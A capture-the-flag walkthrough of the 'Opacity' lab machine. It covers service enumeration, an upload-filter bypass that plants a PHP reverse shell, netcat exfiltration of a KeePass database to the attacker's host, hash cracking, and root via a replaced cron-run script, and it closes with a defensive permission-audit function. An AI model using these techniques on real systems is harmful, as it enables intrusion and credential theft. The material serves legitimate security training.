Enumeration
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 11:11 BST
Nmap scan report for 10.10.87.188
Host is up (0.022s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds
Port 80 open with Apache 2.4.41 running
SMB running

Login box at port 80
More enumeration!
└─$ smbclient -L \\\\10.10.87.188
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))
Not much is available over SMB without authentication.
└─$ smbmap -H 10.10.87.188
[+] IP: 10.10.87.188:445 Name: 10.10.87.188
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023
URL_BASE: http://10.10.87.188/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.87.188/ ----
==> DIRECTORY: http://10.10.87.188/cloud/
The cloud directory looks interesting!

We can try to upload things!
Exploitation
Whilst dirb was running in the background it also found http://10.10.87.188/cloud/images/ , which I assumed is where the uploaded images are stored.
I hosted a server and tried to upload a shell using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . It didn't like this as it had to be an image.
I tried with just a space and then .jpg, which didn't work; using a null character, #.jpg, worked and we had a shell... for a time. The 5-minute upload window meant you only have 5 minutes until the files are deleted.
$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
$ whoami
www-data
$ cd home
$ ls
sysadmin
$ cd sysadmin
$ ls
local.txt
scripts
$ cat local.txt
cat: local.txt: Permission denied
We have a second user, sysadmin; we want this one!
www-data doesn't have much access: there is a scripts folder, but we don't have permissions for that. We do have access to opt, though, and there is an interesting file in there called dataset.kdbx. A .kdbx file is a KeePass database, and we want this!
After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file:
Example: nc -l -p 7555 > myfile.txt
Used: nc -lnvp 4446 > dataset.kdbx
On the source host (victim) we send the file:
Example: nc 10.1.1.2 7555 < myfile.txt
Used: nc 10.9.3.226 4446 < dataset.kdbx
We now have the file! Let's crack it.
Following the guide from https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/ we can pull out the hash using keepass2john and then crack the password.
keepass2john dataset.kdbx > hash.txt
Take the cracked password, open the database, get the new creds.
Remember, SSH is open, let's go get our first flag!
PrivEsc
Now that we're on the machine without a time limit, we can take a breath and think about the next step. Under sysadmin's home there is a script.php, which is the script used to delete the files found within the images folder. This runs every 5 minutes and could be useful. There are a bunch of PHP files under the lib directory.
sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php
Hello... the script is owned by root... but we can't edit :(
After a little, okay a lot, of thinking: we know root is running the script, and we know there is a job to run script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it a go. Using the same script as before, we can load that into a new scripts folder (moving/renaming the old one), call it script.php, set up the listener and wait....
Boom, it worked! From here we can get the final flag!
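As an added defender-side check (not part of the original writeup), the POSIX shell function below walks from a root-executed script up through its parent directories and flags any component that is not owned by the expected user or is writable by others without the sticky bit. That is the misconfiguration that allowed the scripts folder to be swapped out here: scripts/ itself was root-owned, but its parent ~sysadmin was not. The function name, its arguments and the sample layout in the comments are my own.

```shell
#!/bin/sh
# audit_cron_target PATH [TRUSTED_USER] [STOP_DIR]
# Checks PATH and every parent directory up to STOP_DIR (default /).
# A component that is not owned by TRUSTED_USER (default root), or that is
# group/world-writable and not sticky, lets another local user rename or
# replace what root executes. On this box /home/sysadmin/scripts/script.php
# is fine at the file and scripts/ level but /home/sysadmin is sysadmin's.
# Prints one line per finding; returns 0 when clean, 1 when anything was flagged.
audit_cron_target() {
    p=$1
    trusted=${2:-root}
    stop=${3:-/}
    bad=0
    while :; do
        if [ ! -e "$p" ]; then
            echo "MISSING  $p"
            bad=1
        else
            # ls -ld prints "mode links owner group ..."; keep mode and owner
            set -- $(ls -ld "$p")
            mode=$1
            owner=$3
            gw=$(printf '%s' "$mode" | cut -c6)       # group write bit
            ow=$(printf '%s' "$mode" | cut -c9)       # other write bit
            sticky=$(printf '%s' "$mode" | cut -c10)  # t/T means sticky dir
            if [ "$owner" != "$trusted" ]; then
                echo "OWNER    $p (owned by $owner, expected $trusted)"
                bad=1
            fi
            if { [ "$gw" = w ] || [ "$ow" = w ]; } && [ "$sticky" != t ] && [ "$sticky" != T ]; then
                echo "WRITABLE $p (mode $mode)"
                bad=1
            fi
        fi
        [ "$p" = "$stop" ] && break
        [ "$p" = / ] && break
        p=$(dirname "$p")
    done
    return $bad
}
```

Run it against each script referenced from root's crontab, e.g. audit_cron_target /home/sysadmin/scripts/script.php root /, and treat any OWNER or WRITABLE line as a finding to fix before an unprivileged user finds it.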
Really fun machine, this one. Luckily my brain has a small capacity and I totally forgot about SMB, which wasn't required. The folder being cleared out stumped me for a while until the penny dropped, and getting root being as simple as it was tripped me up!